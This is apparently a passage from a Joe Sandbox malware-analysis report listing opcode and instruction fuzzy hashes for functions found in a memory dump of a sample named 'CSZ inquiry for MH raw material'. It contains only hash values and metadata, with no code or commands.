                                                                        • Opcode ID: eb6f03047ba7f6f02e67c366bc32305591d175ea52e99a8413cf64e304a332b4
                                                                        • Instruction ID: ec452ef12bc051cf523b6ccdc3e924c74ce3f50774fc2c5dd1c9f7a7c20ef2ef
                                                                        • Opcode Fuzzy Hash: eb6f03047ba7f6f02e67c366bc32305591d175ea52e99a8413cf64e304a332b4
                                                                        • Instruction Fuzzy Hash: B2B175B19102256FEF2A9B28CC55FFBB2ECEB04754F04529DB919F61C1DB709E848B60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction ID: e51267a8ba9ec40e3d529768f2f5bbfcc0194f6c1e1a0325bc9defd53ccd80cb
                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction Fuzzy Hash: 5BB17074A00608AFDB24DF95DA50AAFB7F9FF84304F10946AA942B7791DE74ED06CB10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction ID: b7d260a808d25d3092a14d4f04ea1b17ded9c1e2a51a3f7b3888d97fab479013
                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction Fuzzy Hash: 91B10671700655AFDB25DB68C940BBEBBF6EF84304F24415AE552AB382D730EE41DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a3a74acb0cc95f5715b29685316705480ca68436f293a100d75ef3d711f8313
                                                                        • Instruction ID: bcf35cc5c113764c0324e5e6e08aa8eda11542e695cd9df0bca69d58bbaa60f5
                                                                        • Opcode Fuzzy Hash: 1a3a74acb0cc95f5715b29685316705480ca68436f293a100d75ef3d711f8313
                                                                        • Instruction Fuzzy Hash: BEC15874108381CFD764CF15C485BABB7E5BF98304F44496EE98997291DBB4EA08CFA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a9712130d5275c3d42f3abbce8c4a72d3498741a3efc6834e8cea7177c57f56f
                                                                        • Instruction ID: e2b8c660a19bfcca80deba96f2b6d7d8286602b279e4eb776998f634c2bc7ae2
                                                                        • Opcode Fuzzy Hash: a9712130d5275c3d42f3abbce8c4a72d3498741a3efc6834e8cea7177c57f56f
                                                                        • Instruction Fuzzy Hash: DBB16D70A10265CBDB34DF64C890BE9B3F5FF44704F1495AAE44AA7291EB70AEC5CB21
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0362febfbf628b16a37dbf23f428cb58098de366c9b78d0a7b89d69db295e9a4
                                                                        • Instruction ID: 187743e99f8c343f0d7252eb3d3f380d244ba5e4225408d6a80859fa0107b8b8
                                                                        • Opcode Fuzzy Hash: 0362febfbf628b16a37dbf23f428cb58098de366c9b78d0a7b89d69db295e9a4
                                                                        • Instruction Fuzzy Hash: DDA11571E006A89FDB21EB99D849FAEBBB4EF04714F150235EA40BB2D1D7749D40CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a11bf35e77fd230259508373a7aba009f495f93d043fa4e32158e0b1ce9e526d
                                                                        • Instruction ID: 4e7cdae77d25c22aa2400654200673214a7efefedec1b91456e199150cfcd327
                                                                        • Opcode Fuzzy Hash: a11bf35e77fd230259508373a7aba009f495f93d043fa4e32158e0b1ce9e526d
                                                                        • Instruction Fuzzy Hash: AEA10F70A016169FDB24DF65C981BAAB7F0FF54318F105029EA15B72C2DB74E885CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a5a0d6b922d4dfd1ec34ba2f4b47050277cc31453a49e3dbc58087637c96d95
                                                                        • Instruction ID: 7396fcdb65b744b74f79b4262ebf4b5c7f799e28e66bc549982a2a3314fa7099
                                                                        • Opcode Fuzzy Hash: 1a5a0d6b922d4dfd1ec34ba2f4b47050277cc31453a49e3dbc58087637c96d95
                                                                        • Instruction Fuzzy Hash: 6BA1DFB2A14651AFCB25DF54C981F6AB7E9FF48308F010529F545AB7A1C334ED42CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e4e5fd3ac9067c1e51aa1e07f58c7101fbd4c16b4192ade9763173fb5878ec3
                                                                        • Instruction ID: 0b2a40c8f215a64b44deaeacbc50d8b3f9216716a14b0456baa63a9d890727cb
                                                                        • Opcode Fuzzy Hash: 2e4e5fd3ac9067c1e51aa1e07f58c7101fbd4c16b4192ade9763173fb5878ec3
                                                                        • Instruction Fuzzy Hash: 0291B071E00225AFCF15DFA8E880BAEBBB5EF4A700F114169E514BB351D774EE009BA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 498308ca115319b3c4a36c3b32a2ea5679dbb88416d533d491de9bde08a4b2f2
                                                                        • Instruction ID: 16f705a4c1236f07bdb209ae7a2202d21f86c6a9c6e7435d959168061017fb38
                                                                        • Opcode Fuzzy Hash: 498308ca115319b3c4a36c3b32a2ea5679dbb88416d533d491de9bde08a4b2f2
                                                                        • Instruction Fuzzy Hash: 73916872A006218BDB24EB58E840BBE77A1EF84718F19516AEC45AF382E634DD41C770
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                        • Instruction ID: f37ebb6333809a4b4db86832a59c0b33f6d2371ee8f8a974610531c909bbcb68
                                                                        • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                        • Instruction Fuzzy Hash: 69816C21A052998BDB214EBCC8C467FBF51EF52344F3A867AD682DF241C264DD86D3A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 372d1deb160d59acaa82a710d2187664f22bb140e3204aaad0370cd14067e30a
                                                                        • Instruction ID: a219227332ba72e39b24eb9d30aa9feffcfe96a72c34b7c17007667e36e37624
                                                                        • Opcode Fuzzy Hash: 372d1deb160d59acaa82a710d2187664f22bb140e3204aaad0370cd14067e30a
                                                                        • Instruction Fuzzy Hash: 3A91F471E00206AFDB14EF68C8817AAB7E1EF94314F149578E85DEB291E774ED41CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 254add3da18e811cedf27b8224fd3421e836aff49f43dfbd7064e60773b36a88
                                                                        • Instruction ID: 3a3e15ab375964698f5d4f054dd3fb8a2e253bd9ba9d4b7ee4855f2ca3ec5c96
                                                                        • Opcode Fuzzy Hash: 254add3da18e811cedf27b8224fd3421e836aff49f43dfbd7064e60773b36a88
                                                                        • Instruction Fuzzy Hash: 9D91D472A101158FCB08CF69C8916BEB7F1EF88314B19867AE819EB396D734E905CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ab0bab99cf9f349cad7e98707a4d2740cc52d10c61f357a4f90c176f1ea53be
                                                                        • Instruction ID: cdc4efeccb1c3ce87eff6b25c7624cafb2522b44fac8f3a2b900ac70d2269630
                                                                        • Opcode Fuzzy Hash: 3ab0bab99cf9f349cad7e98707a4d2740cc52d10c61f357a4f90c176f1ea53be
                                                                        • Instruction Fuzzy Hash: 4981A572E005169BCB14DFA9C9805AEB7F1FF88314B64532ADC29F7290EB74AD51CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fccf1d9865a68112a59a0a02d88a97fdd4cbc41cefb518e87c4539f32910b17c
                                                                        • Instruction ID: 3540ab1b28ea32ab0ac67c64c7a45fa9c09b9889961b51f806357f7e3768e588
                                                                        • Opcode Fuzzy Hash: fccf1d9865a68112a59a0a02d88a97fdd4cbc41cefb518e87c4539f32910b17c
                                                                        • Instruction Fuzzy Hash: 38819675A005599FDB24CF69C880ABEBBB2FFD5314F388196E4549B345D630ED41CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 79f76f9c332362558b8693c9691cfcd2a47a1973d3ebbcc6a12f8dfd51bcf5a5
                                                                        • Instruction ID: f091fc11a94a0403d0e2379aff0ebdb4ca2ada1045da6e218dc8c69c6ff093d7
                                                                        • Opcode Fuzzy Hash: 79f76f9c332362558b8693c9691cfcd2a47a1973d3ebbcc6a12f8dfd51bcf5a5
                                                                        • Instruction Fuzzy Hash: AD81A1B1A006199BDB18CF69D940AFEBBF9FB48704F10952EE455E7640E734D980CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e2e38477b6fd12bbfe210c78faa943d64b1c74f230bc8dc10e990f4daa2f7468
                                                                        • Instruction ID: b3bf737a6706bae21b407a54735b4efc5b4482a3d28776b788ea0f2897a294a3
                                                                        • Opcode Fuzzy Hash: e2e38477b6fd12bbfe210c78faa943d64b1c74f230bc8dc10e990f4daa2f7468
                                                                        • Instruction Fuzzy Hash: C5819172E002159BCB18CF98C9916ADFBF1EF98314B1991AAD81AFB381D730DD41CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction ID: 324b12ad47fb9718e57c422b7ee355f81e2c33f30cc5e6ac3336826596141cdb
                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction Fuzzy Hash: 1C817171A002099FDF19DF98C480AAEB7F2FF84314F18916AE81EAB385D774E941CB51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f54bf93120d17df547a37491b8eac850b70c89d5a4e913257963f52fac27715a
                                                                        • Instruction ID: d8792e5e9d8e4aa85f79e44d8ff510a8e0cc0002fe7eca1a60a9242c0d9a02fb
                                                                        • Opcode Fuzzy Hash: f54bf93120d17df547a37491b8eac850b70c89d5a4e913257963f52fac27715a
                                                                        • Instruction Fuzzy Hash: DD818171A0060DAFDB25CFA5C884BEEBBF9FF48314F158429E655A7250D770AC45CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: faac320e7175469ec772cd9425682e8c874a55c828190ee5f0a495acc478908d
                                                                        • Instruction ID: b853460d5adab9374c8bfe923f945dfb0d86f08c7400672cde2bc89bdb393bb2
                                                                        • Opcode Fuzzy Hash: faac320e7175469ec772cd9425682e8c874a55c828190ee5f0a495acc478908d
                                                                        • Instruction Fuzzy Hash: 7E71F8302042A08EEB24DE2BC94173773E1AB54728F28856AE8D6DB2C5D775FC06DB70
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7266fc08af47e9bc643b20ac6aae167d595988ea2f998388866ddfe4e47b4ad7
                                                                        • Instruction ID: 78ec615df10a38bdc838ced666cbf98af79b935cadfa355f7961af7afc2723c1
                                                                        • Opcode Fuzzy Hash: 7266fc08af47e9bc643b20ac6aae167d595988ea2f998388866ddfe4e47b4ad7
                                                                        • Instruction Fuzzy Hash: B671DF75C11226EFCB258F59D9907BEBBB5FF58700F24511AE882BB390DB749805CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d0fd3676fcce1c23fcff6650c4f2a56893d10f39d3ecb8f4c106389b683be2d
                                                                        • Instruction ID: c79eda6d9ccdb718f05695b59fb5030d59b3e8cc53cdc3c91c59d56f3ee5de9b
                                                                        • Opcode Fuzzy Hash: 0d0fd3676fcce1c23fcff6650c4f2a56893d10f39d3ecb8f4c106389b683be2d
                                                                        • Instruction Fuzzy Hash: 7971C1B1A00204EFCB10DF96D945A9BFBF8EF84304F14A26AE608B72A5D7358D04DF64
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7ea4604bb219c0fe07d3fa5f2b3dc6f60bd81951eba69147d349468b865ef92c
                                                                        • Instruction ID: 812c2c5239a13d73cf365c9f966fae3482f046a9484c51226965ff35a88ad128
                                                                        • Opcode Fuzzy Hash: 7ea4604bb219c0fe07d3fa5f2b3dc6f60bd81951eba69147d349468b865ef92c
                                                                        • Instruction Fuzzy Hash: C5819B70D082459FDB25CF6AC840AAAFBF1EF89704F10D459E499BB245D374E841EF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b18fc3c5b90feff53d6c3f65f355a53fcfd9b0a75f83a31067be5593a5eb9490
                                                                        • Instruction ID: da950a530cfe6bb7a6a5bf3e388386dd4d79fceebbe84820dab5e6ba848bf74c
                                                                        • Opcode Fuzzy Hash: b18fc3c5b90feff53d6c3f65f355a53fcfd9b0a75f83a31067be5593a5eb9490
                                                                        • Instruction Fuzzy Hash: 6F71CE356046419FC321DF28C480B7AB7E5FF94314F1885AAE8998B352EB34DC46CBB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af20d4fcbccc56553f0eea7e1235c765b51b5ca1212d990bf225f4f202e1e091
                                                                        • Instruction ID: 3485f509c99ab938fd4d7025d924f19013888218da26a9695e5e33c4298cc41f
                                                                        • Opcode Fuzzy Hash: af20d4fcbccc56553f0eea7e1235c765b51b5ca1212d990bf225f4f202e1e091
                                                                        • Instruction Fuzzy Hash: BB61E671E082169BCB11FFA5C885ABFB7A9EF54304F20502AE89DB7341DB34DD408BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: def21d5cbea889222ccdd936e42347dab79da938cfc809639aabe420eea5dbf8
                                                                        • Instruction ID: dd08a1d3d5f9f6c903b7c637b45f081537045ba4d514b8e7c9eb935691b40278
                                                                        • Opcode Fuzzy Hash: def21d5cbea889222ccdd936e42347dab79da938cfc809639aabe420eea5dbf8
                                                                        • Instruction Fuzzy Hash: 34719B78A01662DFCB24CF6AC49017AB3F1BF84309BA4947ED84AB7652D770ED40DB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6a52fea941c0debc4eff1d15088a46fac36701901753c7765b62532868be9c0
                                                                        • Instruction ID: 906c29b705c67a17be89eb852af11f7a170f90af2dd2af64c69a76dde5551e30
                                                                        • Opcode Fuzzy Hash: a6a52fea941c0debc4eff1d15088a46fac36701901753c7765b62532868be9c0
                                                                        • Instruction Fuzzy Hash: B971E032200B01AFDB319F14C845F6AB7F5FF84725F544928EA66AB2E1D774E948CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction ID: 55b896483d2c2ac1c958e62f5252eb81bcd2d16d140fba1b4c3205abc95e6d3a
                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction Fuzzy Hash: 42716B71A00619AFCB10DFA9D985EAEBBF9FF48300F104569E605B7251DB34EA41CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e549cc749c76b602ec420020523c81f598d1d355ff60c3e810f66d23eee945a
                                                                        • Instruction ID: 75b770632759fc8c7f39ac6dff7085231f3627af5344d07d83eccaa189d5741d
                                                                        • Opcode Fuzzy Hash: 8e549cc749c76b602ec420020523c81f598d1d355ff60c3e810f66d23eee945a
                                                                        • Instruction Fuzzy Hash: 598181B2A04316DFCB14CF98E580FAEB7B2AB48314F15622DD9007B2A2C7759D45DBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0f9c5596381e702dffc8a24fd4ed47bc6fea9e6136a513553541700fbe172093
                                                                        • Instruction ID: ec02cc26c61240eccdd56d087d1f0b60b933634e024994c9757009e2d139dd94
                                                                        • Opcode Fuzzy Hash: 0f9c5596381e702dffc8a24fd4ed47bc6fea9e6136a513553541700fbe172093
                                                                        • Instruction Fuzzy Hash: B0817075A00205DFCB09CF98C490AAEB7F5FF88304F1581A9E859EB351D734EA41CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7797b5d61ec284b870c835c1283028fd6acb03a114784b455b39498018256f85
                                                                        • Instruction ID: ddc58f928f96c082c5e6a329cf728242d070c0c5cfbc9158d7d2dacb44c9f144
                                                                        • Opcode Fuzzy Hash: 7797b5d61ec284b870c835c1283028fd6acb03a114784b455b39498018256f85
                                                                        • Instruction Fuzzy Hash: 8051FD72504611AFD311DE68C844E5FB7E9EBC5700F048939BA98EB290E671ED0487A3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                        • Instruction ID: 93c1c197cf76713da6abcf41bb6855b4100f989c2f4abf9881cf0b6d6c438226
                                                                        • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                        • Instruction Fuzzy Hash: 2A5157327086024BD715EE28885177BB7D7AFD2354F28A46DE95DE7282DB30DC0587B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 22e3d20013f8cad7ad9d7ca891e8736fa21f2fe84139d762d9c26fa470eead1d
                                                                        • Instruction ID: 4ba71b3a943da3166cf1369e9e65499bc50485ff1cbb04eb0ef4a15d6d1cf164
                                                                        • Opcode Fuzzy Hash: 22e3d20013f8cad7ad9d7ca891e8736fa21f2fe84139d762d9c26fa470eead1d
                                                                        • Instruction Fuzzy Hash: 0851F070940705DFC720CF56D980AABFBF8BF94754F10571EE1A6A76A1CBB0A944CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5ccea10cedf4e646abd365cf6612f7004973028351b5f49c2db1651cd827155
                                                                        • Instruction ID: 460cf009dbaec66f044754a5355f0617dbd0f5da2d514c8665c59984aa9c4e08
                                                                        • Opcode Fuzzy Hash: f5ccea10cedf4e646abd365cf6612f7004973028351b5f49c2db1651cd827155
                                                                        • Instruction Fuzzy Hash: A5517C71210A49DFCB21EF68C984E6AB7F9FF04744F51442AE641A7261D734EE40CB71
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
